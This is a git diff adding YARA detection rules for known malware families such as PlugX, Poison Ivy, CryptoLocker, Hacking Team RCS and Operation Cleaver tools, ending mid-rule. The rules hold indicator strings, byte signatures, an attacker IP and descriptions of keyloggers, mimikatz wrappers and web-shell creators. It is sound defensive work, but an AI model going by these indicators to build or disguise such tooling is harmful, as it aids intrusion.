@@ -0,0 +1,46 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule OlyxCode : Olyx Family
+{
+ meta:
+ description = "Olyx code tricks"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ strings:
+ $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 }
+ $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C }
+
+ condition:
+ any of them
+}
+
+rule OlyxStrings : Olyx Family
+{
+ meta:
+ description = "Olyx Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ strings:
+ $ = "/Applications/Automator.app/Contents/MacOS/DockLight"
+
+ condition:
+ any of them
+}
+
+rule Olyx : Family
+{
+ meta:
+ description = "Olyx"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ condition:
+ OlyxCode or OlyxStrings
+}
diff --git a/malware/Opcleaver.yar b/malware/Opcleaver.yar
new file mode 100644
index 0000000..7281789
--- /dev/null
+++ b/malware/Opcleaver.yar
@@ -0,0 +1,335 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule OPCLEAVER_BackDoorLogger
+{
+ meta:
+ description = "Keylogger used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "BackDoorLogger"
+ $s2 = "zhuAddress"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_Jasus
+{
+ meta:
+ description = "ARP cache poisoner used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "pcap_dump_open"
+ $s2 = "Resolving IPs to poison..."
+ $s3 = "WARNNING: Gateway IP can not be found"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_LoggerModule
+{
+ meta:
+ description = "Keylogger used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "%s-%02d%02d%02d%02d%02d.r"
+ $s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_NetC
+{
+ meta:
+ description = "Net Crawler used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "NetC.exe" wide
+ $s2 = "Net Service"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_ShellCreator2
+{
+ meta:
+ description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "ShellCreator2.Properties"
+ $s2 = "set_IV"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_SmartCopy2
+{
+ meta:
+ description = "Malware or hack tool used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "SmartCopy2.Properties"
+ $s2 = "ZhuFrameWork"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_SynFlooder
+{
+ meta:
+ description = "Malware or hack tool used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+ $s2 = "your target’s IP is : %s"
+ $s3 = "Raw TCP Socket Created successfully."
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_TinyZBot
+{
+ meta:
+ description = "Tiny Bot used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "NetScp" wide
+ $s2 = "TinyZBot.Properties.Resources.resources"
+ $s3 = "Aoao WaterMark"
+ $s4 = "Run_a_exe"
+ $s5 = "netscp.exe"
+ $s6 = "get_MainModule_WebReference_DefaultWS"
+ $s7 = "remove_CheckFileMD5Completed"
+ $s8 = "http://tempuri.org/"
+ $s9 = "Zhoupin_Cleaver"
+ condition:
+ (($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9)
+}
+
+rule OPCLEAVER_ZhoupinExploitCrew
+{
+ meta:
+ description = "Keywords used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "zhoupin exploit crew" nocase
+ $s2 = "zhopin exploit crew" nocase
+ condition:
+ 1 of them
+}
+
+rule OPCLEAVER_antivirusdetector
+{
+ meta:
+ description = "Hack tool used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "getShadyProcess"
+ $s2 = "getSystemAntiviruses"
+ $s3 = "AntiVirusDetector"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_csext
+{
+ meta:
+ description = "Backdoor used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "COM+ System Extentions"
+ $s2 = "csext.exe"
+ $s3 = "COM_Extentions_bin"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_kagent
+{
+ meta:
+ description = "Backdoor used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "kill command is in last machine, going back"
+ $s2 = "message data length in B64: %d Bytes"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_mimikatzWrapper
+{
+ meta:
+ description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "mimikatzWrapper"
+ $s2 = "get_mimikatz"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_pvz_in
+{
+ meta:
+ description = "Parviz tool used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "LAST_TIME=00/00/0000:00:00PM$"
+ $s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_pvz_out
+{
+ meta:
+ description = "Parviz tool used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "Network Connectivity Module" wide
+ $s2 = "OSPPSVC" wide
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_wndTest
+{
+ meta:
+ description = "Backdoor used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "[Alt]" wide
+ $s2 = "<< %s >>:" wide
+ $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_zhCat
+{
+ meta:
+ description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
+ $s2 = "ABC ( A Big Company )" wide fullword
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_zhLookUp
+{
+ meta:
+ description = "Hack tool used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "zhLookUp.Properties"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_zhmimikatz
+{
+ meta:
+ description = "Mimikatz wrapper used by attackers in Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Cylance Inc."
+ score = "70"
+ strings:
+ $s1 = "MimikatzRunner"
+ $s2 = "zhmimikatz"
+ condition:
+ all of them
+}
+
+rule OPCLEAVER_Parviz_Developer
+{
+ meta:
+ description = "Parviz developer known from Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Florian Roth"
+ score = "70"
+ strings:
+ $s1 = "Users\\parviz\\documents\\" nocase
+ condition:
+ $s1
+}
+
+rule OPCLEAVER_CCProxy_Config
+{
+ meta:
+ description = "CCProxy config known from Operation Cleaver"
+ reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ date = "2014/12/02"
+ author = "Florian Roth"
+ score = "70"
+ strings:
+ $s1 = "UserName=User-001" fullword ascii
+ $s2 = "Web=1" fullword ascii
+ $s3 = "Mail=1" fullword ascii
+ $s4 = "FTP=0" fullword ascii
+ $x1 = "IPAddressLow=78.109.194.114" fullword ascii
+ condition:
+ all of ($s*) or $x1
+}
diff --git a/malware/PlugX.yar b/malware/PlugX.yar
new file mode 100644
index 0000000..33da0ae
--- /dev/null
+++ b/malware/PlugX.yar
@@ -0,0 +1,47 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule PlugXStrings : PlugX Family
+{
+ meta:
+ description = "PlugX Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-12"
+
+ strings:
+ $BootLDR = "boot.ldr" wide ascii
+ $Dwork = "d:\\work" nocase
+ $Plug25 = "plug2.5"
+ $Plug30 = "Plug3.0"
+ $Shell6 = "Shell6"
+
+ condition:
+ $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6))
+}
+
+rule plugX : rat
+{
+ meta:
+ author = "Jean-Philippe Teissier / @Jipe_"
+ description = "PlugX RAT"
+ date = "2014-05-13"
+ filetype = "memory"
+ version = "1.0"
+ ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py"
+
+ strings:
+ $v1a = { 47 55 4C 50 00 00 00 00 }
+ $v1b = "/update?id=%8.8x"
+ $v1algoa = { BB 33 33 33 33 2B }
+ $v1algob = { BB 44 44 44 44 2B }
+ $v2a = "Proxy-Auth:"
+ $v2b = { 68 A0 02 00 00 }
+ $v2k = { C1 8F 3A 71 }
+
+ condition:
+ $v1a at 0 or $v1b or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k))
+}
diff --git a/malware/PoisonIvy.yar b/malware/PoisonIvy.yar
new file mode 100644
index 0000000..0c2b7f8
--- /dev/null
+++ b/malware/PoisonIvy.yar
@@ -0,0 +1,24 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule poisonivy : rat
+{
+ meta:
+ description = "Poison Ivy"
+ author = "Jean-Philippe Teissier / @Jipe_"
+ date = "2013-02-01"
+ filetype = "memory"
+ version = "1.0"
+ ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py"
+
+ strings:
+ $a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C }
+
+ condition:
+ $a
+}
+
diff --git a/malware/PubSab.yar b/malware/PubSab.yar
new file mode 100644
index 0000000..3d03254
--- /dev/null
+++ b/malware/PubSab.yar
@@ -0,0 +1,47 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule PubSabCode : PubSab Family
+{
+ meta:
+ description = "PubSab code tricks"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ strings:
+ $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 }
+
+ condition:
+ any of them
+}
+
+rule PubSabStrings : PubSab Family
+{
+ meta:
+ description = "PubSab Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ strings:
+ $ = "_deamon_init"
+ $ = "com.apple.PubSabAgent"
+ $ = "/tmp/screen.jpeg"
+
+ condition:
+ any of them
+}
+
+rule PubSab : Family
+{
+ meta:
+ description = "PubSab"
+ author = "Seth Hardy"
+ last_modified = "2014-06-19"
+
+ condition:
+ PubSabCode or PubSabStrings
+}
diff --git a/malware/Quarian.yar b/malware/Quarian.yar
new file mode 100644
index 0000000..6116214
--- /dev/null
+++ b/malware/Quarian.yar
@@ -0,0 +1,75 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule QuarianStrings : Quarian Family
+{
+ meta:
+ description = "Quarian Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-07-09"
+
+ strings:
+ $ = "s061779s061750"
+ $ = "[OnUpLoadFile]"
+ $ = "[OnDownLoadFile]"
+ $ = "[FileTransfer]"
+ $ = "---- Not connect the Manager, so start UnInstall ----"
+ $ = "------- Enter CompressDownLoadDir ---------"
+ $ = "------- Enter DownLoadDirectory ---------"
+ $ = "[HandleAdditionalData]"
+ $ = "[mswsocket.dll]"
+ $ = "msupdate.dll........Enter ThreadCmd!"
+ $ = "ok1-1"
+ $ = "msupdate_tmp.dll"
+ $ = "replace Rpcss.dll successfully!"
+ $ = "f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb"
+ $ = "\\drivercashe\\" wide ascii
+ $ = "\\microsoft\\windwos\\" wide ascii
+ $ = "\\DosDevices\\LOADHIDDENDRIVER" wide ascii
+ $ = "\\Device\\LOADHIDDENDRIVER" wide ascii
+ $ = "Global\\state_maping" wide ascii
+ $ = "E:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdb"
+ $ = "Global\\unInstall_event_1554_Ower" wide ascii
+
+ condition:
+ any of them
+}
+
+rule QuarianCode : Quarian Family
+{
+ meta:
+ description = "Quarian code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-09"
+
+ strings:
+ // decrypt in intelnat.sys
+ $ = { C1 E? 04 8B ?? F? C1 E? 05 33 C? }
+ // decrypt in mswsocket.dll
+ $ = { C1 EF 05 C1 E3 04 33 FB }
+ $ = { 33 D8 81 EE 47 86 C8 61 }
+ // loop in msupdate.dll
+ $ = { FF 45 E8 81 45 EC CC 00 00 00 E9 95 FE FF FF }
+
+ condition:
+ any of them
+}
+
+rule Quarian : Family
+{
+ meta:
+ description = "Quarian"
+ author = "Seth Hardy"
+ last_modified = "2014-07-09"
+
+ condition:
+ QuarianCode or QuarianStrings
+}
+
+
+
+
diff --git a/malware/RAT_Terminator.yar b/malware/RAT_Terminator.yar
new file mode 100644
index 0000000..417cd42
--- /dev/null
+++ b/malware/RAT_Terminator.yar
@@ -0,0 +1,40 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule TerminatorRat : rat
+{
+ meta:
+ description = "Terminator RAT"
+ author = "Jean-Philippe Teissier / @Jipe_"
+ date = "2013-10-24"
+ filetype = "memory"
+ version = "1.0"
+ ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html"
+
+ strings:
+ $a = "Accelorator"
+ $b = "<html><title>12356</title><body>"
+
+ condition:
+ all of them
+}
+
+
+
+rule TROJAN_Notepad_shell_crew {
+ meta:
+ author = "RSA_IR"
+ Date = "4Jun13"
+ File = "notepad.exe v 1.1"
+ MD5 = "106E63DBDA3A76BEEB53A8BBD8F98927"
+ strings:
+ $s1 = "75BAA77C842BE168B0F66C42C7885997"
+ $s2 = "B523F63566F407F3834BCC54AAA32524"
+ condition:
+ $s1 or $s2
+}
diff --git a/malware/RCS.yar b/malware/RCS.yar
new file mode 100644
index 0000000..666f46b
--- /dev/null
+++ b/malware/RCS.yar
@@ -0,0 +1,73 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RCS_Backdoor
+{
+ meta:
+ description = "Hacking Team RCS Backdoor"
+ author = "botherder https://github.com/botherder"
+
+ strings:
+ $filter1 = "$debug3"
+ $filter2 = "$log2"
+ $filter3 = "error2"
+
+ $debug1 = /\- (C)hecking components/ wide ascii
+ $debug2 = /\- (A)ctivating hiding system/ wide ascii
+ $debug3 = /(f)ully operational/ wide ascii
+
+ $log1 = /\- Browser activity \(FF\)/ wide ascii
+ $log2 = /\- Browser activity \(IE\)/ wide ascii
+
+ // Cause false positives.
+ //$log3 = /\- About to call init routine at %p/ wide ascii
+ //$log4 = /\- Calling init routine at %p/ wide ascii
+
+ $error1 = /\[Unable to deploy\]/ wide ascii
+ $error2 = /\[The system is already monitored\]/ wide ascii
+
+ condition:
+ (2 of ($debug*) or 2 of ($log*) or all of ($error*)) and not any of ($filter*)
+}
+
+rule RCS_Scout
+{
+ meta:
+ description = "Hacking Team RCS Scout"
+ author = "botherder https://github.com/botherder"
+
+ strings:
+ $filter1 = "$engine5"
+ $filter2 = "$start4"
+ $filter3 = "$upd2"
+ $filter4 = "$lookma6"
+
+ $engine1 = /(E)ngine started/ wide ascii
+ $engine2 = /(R)unning in background/ wide ascii
+ $engine3 = /(L)ocking doors/ wide ascii
+ $engine4 = /(R)otors engaged/ wide ascii
+ $engine5 = /(I)\'m going to start it/ wide ascii
+
+ $start1 = /Starting upgrade\!/ wide ascii
+ $start2 = /(I)\'m going to start the program/ wide ascii
+ $start3 = /(i)s it ok\?/ wide ascii
+ $start4 = /(C)lick to start the program/ wide ascii
+
+ $upd1 = /(U)pdJob/ wide ascii
+ $upd2 = /(U)pdTimer/ wide ascii
+
+ $lookma1 = /(O)wning PCI bus/ wide
+ $lookma2 = /(F)ormatting bios/ wide
+ $lookma3 = /(P)lease insert a disk in drive A:/ wide
+ $lookma4 = /(U)pdating CPU microcode/ wide
+ $lookma5 = /(N)ot sure what's happening/ wide
+ $lookma6 = /(L)ook ma, no thread id\! \\\\o\// wide
+
+ condition:
+ (all of ($engine*) or all of ($start*) or all of ($upd*) or 4 of ($lookma*)) and not any of ($filter*)
+}
+
diff --git a/malware/Ramsonware.yar b/malware/Ramsonware.yar
new file mode 100644
index 0000000..e6f403d
--- /dev/null
+++ b/malware/Ramsonware.yar
@@ -0,0 +1,65 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule CryptoLocker_set1
+{
+meta:
+ author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+ date = "2014-04-13"
+ description = "Detection of Cryptolocker Samples"
+
+strings:
+ $string0 = "static"
+ $string1 = " kscdS"
+ $string2 = "Romantic"
+ $string3 = "CompanyName" wide
+ $string4 = "ProductVersion" wide
+ $string5 = "9%9R9f9q9"
+ $string6 = "IDR_VERSION1" wide
+ $string7 = " </trustInfo>"
+ $string8 = "LookFor" wide
+ $string9 = ":n;t;y;"
+ $string10 = " <requestedExecutionLevel level"
+ $string11 = "VS_VERSION_INFO" wide
+ $string12 = "2.0.1.0" wide
+ $string13 = "<assembly xmlns"
+ $string14 = " <trustInfo xmlns"
+ $string15 = "srtWd@@"
+ $string16 = "515]5z5"
+ $string17 = "C:\\lZbvnoVe.exe" wide
+condition:
+ 8 of ($string*)
+}
+
+rule CryptoLocker_rule2
+{
+meta:
+ author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+ date = "2014-04-14"
+ description = "Detection of CryptoLocker Variants"
+strings:
+ $string0 = "2.0.1.7" wide
+ $string1 = " <security>"
+ $string2 = "Romantic"
+ $string3 = "ProductVersion" wide
+ $string4 = "9%9R9f9q9"
+ $string5 = "IDR_VERSION1" wide
+ $string6 = "button"
+ $string7 = " </security>"
+ $string8 = "VFileInfo" wide
+ $string9 = "LookFor" wide
+ $string10 = " </requestedPrivileges>"
+ $string11 = " uiAccess"
+ $string12 = " <trustInfo xmlns"
+ $string13 = "last.inf"
+ $string14 = " manifestVersion"
+ $string15 = "FFFF04E3" wide
+ $string16 = "3,31363H3P3m3u3z3"
+condition:
+ 8 of ($string*)
+}
+
diff --git a/malware/Regsubdat.yar b/malware/Regsubdat.yar
new file mode 100644
index 0000000..0a33d15
--- /dev/null
+++ b/malware/Regsubdat.yar
@@ -0,0 +1,54 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RegSubDatCode : RegSubDat Family
+{
+ meta:
+ description = "RegSubDat code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-14"
+
+ strings:
+ // decryption loop
+ $ = { 80 34 3? 99 40 (3D FB 65 00 00 | 3B C6) 7? F? }
+ // push then pop values
+ $ = { 68 FF FF 7F 00 5? }
+ $ = { 68 FF 7F 00 00 5? }
+
+ condition:
+ all of them
+}
+
+rule RegSubDatStrings : RegSubDat Family
+{
+ meta:
+ description = "RegSubDat Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-07-14"
+
+ strings:
+ $avg1 = "Button"
+ $avg2 = "Allow"
+ $avg3 = "Identity Protection"
+ $avg4 = "Allow for all"
+ $avg5 = "AVG Firewall Asks For Confirmation"
+ $mutex = "0x1A7B4C9F"
+
+ condition:
+ all of ($avg*) or $mutex
+}
+
+rule RegSubDat : Family
+{
+ meta:
+ description = "RegSubDat"
+ author = "Seth Hardy"
+ last_modified = "2014-07-14"
+
+ condition:
+ RegSubDatCode or RegSubDatStrings
+}
diff --git a/malware/Rooter.yar b/malware/Rooter.yar
new file mode 100644
index 0000000..51d63e7
--- /dev/null
+++ b/malware/Rooter.yar
@@ -0,0 +1,81 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RooterCode : Rooter Family
+{
+ meta:
+ description = "Rooter code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-10"
+
+ strings:
+ // xor 0x30 decryption
+ $ = { 80 B0 ?? ?? ?? ?? 30 40 3D 00 50 00 00 7C F1 }
+
+ condition:
+ any of them
+}
+
+rule RooterStrings : Rooter Family
+{
+ meta:
+ description = "Rooter Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-07-10"
+
+ strings:
+ $group1 = "seed\x00"
+ $group2 = "prot\x00"
+ $group3 = "ownin\x00"
+ $group4 = "feed0\x00"
+ $group5 = "nown\x00"
+
+ condition:
+ 3 of ($group*)
+}
+
+
+rule Rooter : Family
+{
+ meta:
+ description = "Rooter"
+ author = "Seth Hardy"
+ last_modified = "2014-07-10"
+
+ condition:
+ RooterCode or RooterStrings
+}
+
+rule RookieCode : Rookie Family
+{
+ meta:
+ description = "Rookie code features"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ // hidden AutoConfigURL
+ $ = { C6 ?? ?? ?? 41 C6 ?? ?? ?? 75 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 43 C6 ?? ?? ?? 6F C6 ?? ?? ?? 6E C6 ?? ?? ?? 66 }
+ // hidden ProxyEnable
+ $ = { C6 ?? ?? ?? 50 [4] C6 ?? ?? ?? 6F C6 ?? ?? ?? 78 C6 ?? ?? ?? 79 C6 ?? ?? ?? 45 C6 ?? ?? ?? 6E C6 ?? ?? ?? 61 }
+ // xor on rand value?
+ $ = { 8B 1D 10 A1 40 00 [18] FF D3 8A 16 32 D0 88 16 }
+
+ condition:
+ any of them
+}
+
+rule Rookie : Family
+{
+ meta:
+ description = "Rookie"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ condition:
+ RookieCode or RookieStrings
+}
diff --git a/malware/Safenet.yar b/malware/Safenet.yar
new file mode 100644
index 0000000..be7d844
--- /dev/null
+++ b/malware/Safenet.yar
@@ -0,0 +1,50 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule SafeNetCode : SafeNet Family
+{
+ meta:
+ description = "SafeNet code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-16"
+
+ strings:
+ // add edi, 14h; cmp edi, 50D0F8h
+ $ = { 83 C7 14 81 FF F8 D0 40 00 }
+ condition:
+ any of them
+}
+
+rule SafeNetStrings : SafeNet Family
+{
+ meta:
+ description = "Strings used by SafeNet"
+ author = "Seth Hardy"
+ last_modified = "2014-07-16"
+
+ strings:
+ $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr"
+ $ = "/safe/record.php"
+ $ = "_Rm.bat" wide ascii
+ $ = "try\x0d\x0a\x09\x09\x09\x09 del %s" wide ascii
+ $ = "Ext.org" wide ascii
+
+ condition:
+ any of them
+
+}
+
+rule SafeNet : Family
+{
+ meta:
+ description = "SafeNet family"
+
+ condition:
+ SafeNetCode or SafeNetStrings
+
+}
+
diff --git a/malware/Scarhikn.yar b/malware/Scarhikn.yar
new file mode 100644
index 0000000..97f034d
--- /dev/null
+++ b/malware/Scarhikn.yar
@@ -0,0 +1,57 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ScarhiknStrings : Scarhikn Family
+{
+ meta:
+ description = "Scarhikn Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ $ = "9887___skej3sd"
+ $ = "haha123"
+
+ condition:
+ any of them
+}
+
+
+
+rule ScarhiknCode : Scarhikn Family
+{
+ meta:
+ description = "Scarhikn code features"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ // decryption
+ $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 }
+ $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 }
+
+ condition:
+ any of them
+}
+
+rule Scarhikn : Family
+{
+ meta:
+ description = "Scarhikn"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ condition:
+ ScarhiknCode or ScarhiknStrings
+}
+
+
+
+
+
+
+
diff --git a/malware/Scieron.yar b/malware/Scieron.yar
new file mode 100644
index 0000000..4a8a9d7
--- /dev/null
+++ b/malware/Scieron.yar
@@ -0,0 +1,34 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Scieron
+{
+ meta:
+ author = "Symantec Security Response"
+ ref = "http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012"
+ date = "22.01.15"
+
+ strings:
+ // .text:10002069 66 83 F8 2C cmp ax, ','
+ // .text:1000206D 74 0C jz short loc_1000207B
+ // .text:1000206F 66 83 F8 3B cmp ax, ';'
+ // .text:10002073 74 06 jz short loc_1000207B
+ // .text:10002075 66 83 F8 7C cmp ax, '|'
+ // .text:10002079 75 05 jnz short loc_10002080
